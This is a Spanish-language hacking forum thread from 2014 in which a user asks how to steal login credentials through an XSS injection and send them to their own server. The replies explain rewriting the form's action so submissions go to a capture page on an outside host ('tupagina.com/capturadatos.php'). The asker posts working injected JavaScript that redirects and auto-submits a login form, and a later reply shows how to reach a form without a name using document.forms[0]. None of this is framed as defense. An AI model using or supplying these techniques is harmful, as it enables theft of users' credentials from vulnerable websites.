Foro de elhacker.net

Seguridad Informática => Hacking => Mensaje iniciado por: Varlch en 21 Noviembre 2014, 14:26 pm


Título: ¿Como se puede robar post o get desde javascript?
Publicado por: Varlch en 21 Noviembre 2014, 14:26 pm
¿Como se puede obtener post o get de un form desde un javascript y enviar estos a mi servidor?

Pongamos que hago una inyección XSS en una web donde esta el form de login, ¿se podría hacer que envíe el user y pass a mi servidor, o simplemente no se puede?

Título: Re: ¿Como se puede robar post o get desde javascript?
Publicado por: T. Collins en 21 Noviembre 2014, 14:32 pm
Si como dices, puedes ejecutar javascript, claro que se puede. Por ejemplo, la forma más simple y cantosa es cambiar el action del form.

Título: Re: ¿Como se puede robar post o get desde javascript?
Publicado por: Varlch en 21 Noviembre 2014, 14:59 pm
¿Un pequeño ejemplo?

Título: Re: ¿Como se puede robar post o get desde javascript?
Publicado por: engel lex en 21 Noviembre 2014, 15:05 pm
es simplemente cambiar el action del form :P

es decir
si el form originalmente es
Código
  1. <form method="POST" action="/paginadatos.php">
haces un jscript que lo cambie a
Código
  1. <form method="POST" action="http://tupagina.com/capturadatos.php">

si tienes dudas sobre como hacerlo recomiendo leer un tutorial sobre jscript completo que toque manipulación del DOM :P

Título: Re: ¿Como se puede robar post o get desde javascript?
Publicado por: Varlch en 21 Noviembre 2014, 17:16 pm
He conseguido hacerlo
Código:
<form action="" method="post" name="nombre_form">
<input type="text" name="Username" placeholder="Usuario"/><br />
<input type="password" name="Password" placeholder="Contraseña" /><br />
<input type="submit" value="Enviar" />
//código supuestamente inyectado
<script>
document.nombre_form.action = 'obtener_datos.php';
document.nombre_form.submit();
</script>

luego solo hace falta un obtener_datos.php que recoja las variables y las envié otra vez al servidor inicial pero que pasa si el form no tiene la variable name.

Título: Re: ¿Como se puede robar post o get desde javascript?
Publicado por: T. Collins en 21 Noviembre 2014, 17:48 pm
Puedes acceder al form de distintas formas, como has puesto tú, con document.getElementById si tiene un id, con document.forms[] ....

Título: Re: ¿Como se puede robar post o get desde javascript?
Publicado por: Varlch en 21 Noviembre 2014, 17:52 pm
Pongamos que tienes exactamente este form:
Código:
<form action="" method="post">
<input type="text" name="Username" placeholder="Usuario"/><br />
<input type="password" name="Password" placeholder="Contraseña" /><br />
<input type="submit" value="Enviar" />
//código a inyectar

como robarías las supuestas credenciales en este mismo form.

Título: Re: ¿Como se puede robar post o get desde javascript?
Publicado por: T. Collins en 21 Noviembre 2014, 17:58 pm
Si es el único o primer form de la página, document.forms[0]. En el navegador tienes una consola de javascript y puedes ir probando, además hay mucha información en internet sobre como hacer esto.

Título: Re: ¿Como se puede robar post o get desde javascript?
Publicado por: Varlch en 21 Noviembre 2014, 18:01 pm
Pues ya esta todo resuelto, gracias.


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines